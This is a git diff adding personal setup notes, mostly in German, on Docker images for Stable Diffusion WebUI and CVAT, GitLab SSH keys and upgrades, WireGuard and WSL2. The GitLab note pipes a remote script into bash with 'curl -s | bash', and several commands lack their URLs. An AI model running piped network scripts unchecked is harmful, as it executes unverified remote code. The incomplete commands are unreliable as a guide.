+ curl \
+ wget \
+ sudo \
+ git \
+ && rm -rf /var/lib/apt/lists/*
+# Installiere hier PyTorch mit GPU support (Versionen können angepasst werden)
+RUN python3.8 -m pip install --upgrade pip \
+ torch==2.0.1\
+ torchvision==0.15.2
+# Erstellen eines non-root Users
+RUN useradd -l -m -s /bin/bash -u $UID $NB_USER
+# Arbeitsverzeichnis festlegen
+# PART 2: Stable Diffusion WebUI von Automatic1111 installieren
+RUN echo "Etc/UTC" > /etc/timezone
+RUN sudo apt-get update
+RUN sudo apt-get install -y python3.8-venv
+RUN sudo apt-get install -y libgl1-mesa-glx
+RUN sudo apt-get update -y
+RUN DEBIAN_FRONTEND=noninteractive TZ=Etc/UTC apt-get -y install libglib2.0-0
+RUN git clone
+RUN pip install -r /app/stable-diffusion-webui/requirements.txt
+RUN chown -R gpuuser:gpuuser /app/stable-diffusion-webui
+# und zum non-root User wechseln
+RUN chmod +x /app/stable-diffusion-webui/
+# Starte die Konsole wenn wir den container starten
+ CMD ["/bin/bash", "-c", "cd /app/stable-diffusion-webui && bash --listen"]
+Wir nutzen das Image folgendermaßen:
+docker run --gpus all -p 7860:7860 -v /pfad/auf/host:/pfad/im/container -it sdgpu
+So nutze ich in Summe 5 volumens um verschiedene Dateien von außen bearbeiten zu können. (Getestet unter Windows.)
+-v C:\Users\User\Desktop\temp2\sdtest\outputs\:/app/stable-diffusion-webui/outputs/
+-v C:\Users\User\Desktop\temp2\sdtest\models\:/app/stable-diffusion-webui/models/
+-v C:\Users\User\Desktop\temp2\sdtest\embeddings\:/app/stable-diffusion-webui/embeddings/
+-v C:\Users\User\Desktop\temp2\sdtest\extensions\:/app/stable-diffusion-webui/extensions/
+-v C:\Users\User\Desktop\temp2\sdtest\log\:/app/stable-diffusion-webui/log/
+Der Pfad auf dem Host muss natürlich angepasst werden.
+So ist z.B. ein Beispielstart:
+docker run --gpus all -p 7860:7860 -v C:\Users\User\Desktop\temp2\sdtest\outputs\:/app/stable-diffusion-webui/outputs/ -v C:\Users\User\Desktop\temp2\sdtest\models\:/app/stable-diffusion-webui/models/ -v C:\Users\User\Desktop\temp2\sdtest\embeddings\:/app/stable-diffusion-webui/embeddings/ -v C:\Users\User\Desktop\temp2\sdtest\extensions\:/app/stable-diffusion-webui/extensions/ -v C:\Users\User\Desktop\temp2\sdtest\log\:/app/stable-diffusion-webui/log/ -it sdtesting
+Es wurde alles getestet unter:
+- Windows 10 x86
+- Desktop Docker v4.18.0
+- Nvidia Driver 537.13
+- Cuda Version 12.2
+- Grafikkarte: NVIDIA GeForce GTX 1080 Ti
+*Notiz für Unraid nutzer:*
+Damit man eigene Images von seinem Privaten repository auf seinem Server nutzen kann, sollte man seine Registry entweder mit einem Zertifikat versehen oder man fügt seine Registry zu den ```insecure-registries``` hinzu.
+$ nano /boot/config/docker.cfg
+$ /etc/rc.d/rc.docker restart
diff --git a/docker/ b/docker/
new file mode 100644
index 0000000..a906a3a
--- /dev/null
+++ b/docker/
@@ -0,0 +1,100 @@
+# Install CVAT in a Ubuntu Docker Container
+This is a little tutorial to install CVAT in a docker container.
+NOT fully tested❗❗❗
+### Step 1: Create a Dockerfile
+This Dockerfile will install Docker, Docker Compose, CVAT, and Google Chrome on an Ubuntu 22.04 base image.
+# Use the official Ubuntu 22.04 image as a base
+FROM ubuntu:22.04
+# Set environment variables
+ENV DEBIAN_FRONTEND=noninteractive
+# Update and install necessary packages
+RUN apt-get update && \
+ apt-get --no-install-recommends install -y \
+ apt-transport-https \
+ ca-certificates \
+ curl \
+ gnupg-agent \
+ software-properties-common \
+ git \
+ sudo \
+ wget \
+ python3-pip \
+ python3-dev
+# Install Docker
+RUN curl -fsSL | apt-key add - && \
+ add-apt-repository \
+ "deb [arch=amd64] \
+ $(lsb_release -cs) \
+ stable" && \
+ apt-get update && \
+ apt-get --no-install-recommends install -y \
+ docker-ce docker-ce-cli docker-compose-plugin
+# Install Google Chrome
+RUN curl | apt-key add - && \
+ sh -c 'echo "deb [arch=amd64] stable main" >> /etc/apt/sources.list.d/google-chrome.list' && \
+ apt-get update && \
+ apt-get --no-install-recommends install -y google-chrome-stable
+# Clone CVAT repository
+RUN git clone /cvat
+# Set working directory
+WORKDIR /cvat
+# Set default environment variables
+ENV CVAT_HOST=localhost
+# Expose the necessary ports
+EXPOSE 8080
+# Start CVAT
+CMD ["bash", "-c", "export CVAT_HOST=$CVAT_HOST && docker-compose up -d && sleep infinity"]
+### Step 2: Build the Docker Image
+Build the Docker image using the Dockerfile.
+docker build -t cvat-ubuntu-22.04 .
+### Step 3: Run the Docker Container
+Run the Docker container with adjustable environment variables.
+docker run -d --name cvat-container -p 8080:8080 \
+ -e CVAT_HOST="your_host_or_ip" \
+ -e CVAT_VERSION="your_version" \
+ cvat-ubuntu-22.04
+### Step 4: Create a Superuser
+After the container is running, create a superuser for CVAT.
+docker exec -it cvat-container bash -c 'docker-compose exec cvat_server bash -ic "python3 ~/ createsuperuser"'
+### Step 5: Access CVAT
+Open Google Chrome and navigate to `http://localhost:8080` to access CVAT. Log in with the superuser credentials you created.
+### Notes
+1. **Adjustable Parameters**: The `CVAT_HOST` and `CVAT_VERSION` environment variables can be set when running the Docker container to adjust the host and CVAT version.
+2. **Permissions**: Ensure that the Docker daemon has the necessary permissions. You might need to run the Docker commands with `sudo` or adjust the Docker group settings as described in the tutorial.
diff --git a/ b/
new file mode 100644
index 0000000..72e1772
--- /dev/null
+++ b/
@@ -0,0 +1,22 @@
+# Visual Studio Code mit GitLab verbinden 🦊
+### SSH-Schlüssel generieren und in GitLab ablegen
+1. Installiere Git auf deinem Rechner. [Git](
+2. Öffne anschließend die *CMD*.
+3. **Erstelle einen 2048-bit RSA Schlüssel** um damit eine ssh-Verbindung zum Git-OTH Server aufzubauen.
+ 1. Befehl (im CMD): `ssh-keygen -t rsa -b 2048 -C "Git-OTH"`
+4. Hier kann man sich einfach mit "Enter" durchklicken.
+5. Der Schlüssel sollte sich nun z.B. in _C:\User\Name/.ssh_ befinden
+ 1. Die Datei kann z.B. _id_ed25519.pub_ heißen.
+6. Nun öffne Git Bash
+7. gib nun `cat ~/.ssh/ | clip` ein um den Schlüssel zu kopieren.
+8. Gehe nun auf deinen GitLab Account → Einstellungen → SSH Keys.
+9. Füge nun dort den Schlüssel ein und klicke unten auf _Add Key_
+### Klonen des Repositories
+1. Gehe nun auf unsere Repositoy → klick auf Clone → Visual Studio Code (SSH)
+2. Lege ein Speicherort für das Projekt ab, anschließend wird das Projekt geöffnet.
+Fertig 🎉🎉
diff --git a/gitlab/ b/gitlab/
new file mode 100644
index 0000000..881440b
--- /dev/null
+++ b/gitlab/
@@ -0,0 +1,7 @@
+### Upgrade Components
+Im Docker folgenden Befehl ausführen:
+curl -s | bash
+apt-get install gitlab-ce
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+# Install clean Wireguard
+Basierend auf dem Betriebssystem muss man verschiedene Kommandos verwenden.
+apt-get update
+apt install wireguard
+apt update
+apt install iproute2
+siehe: [](
+# Wireguard - Server
+Ordner: ```/etc/wireguard```
+Die Konfiguration ist in: ```wg0.conf```
+Um die Konfiguration neu zu starten: ```systemctl reload wg-quick@wg0```
diff --git a/wsl/ b/wsl/
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+**Installing Multiple Instances of Ubuntu WSL2**
+### **Step 1: Install Latest Version of Ubuntu WSL2**
+wsl install
+### **Step 2: Download Ubuntu WSL Tarball**
+Go to the website []( and download the .tar.gz file.
+Unzip the file so there is only one .tar file left.
+### **Step 3: Install Second Instance Ubuntu WSL2**
+Create a folder anywhere on the system. In this example the folder is in ```C:\Test_Server_Cloud\```.
+Export the image:
+Make a copy of the file, sometimes an error occurs and the image vanishes.
+wsl --export Ubuntu2 C:\Test_Server_Cloud\ubuntu-noble-wsl-amd64-wsl.rootfs.tar
+Import the image:
+wsl --import Ubuntu2 .\Ubuntu2\ .\ubuntu-noble-wsl-amd64-wsl.rootfs.tar
+### **Step 4: Login to Second Instance Ubuntu WSL2**
+wsl ~ -d Ubuntu2
+### **Step 5: Setup User Accounts**
+useradd -m -G sudo -s /bin/bash $NEW_USER
+passwd $NEW_USER
+### **Step 6: Configure Default User**
+tee /etc/wsl.conf <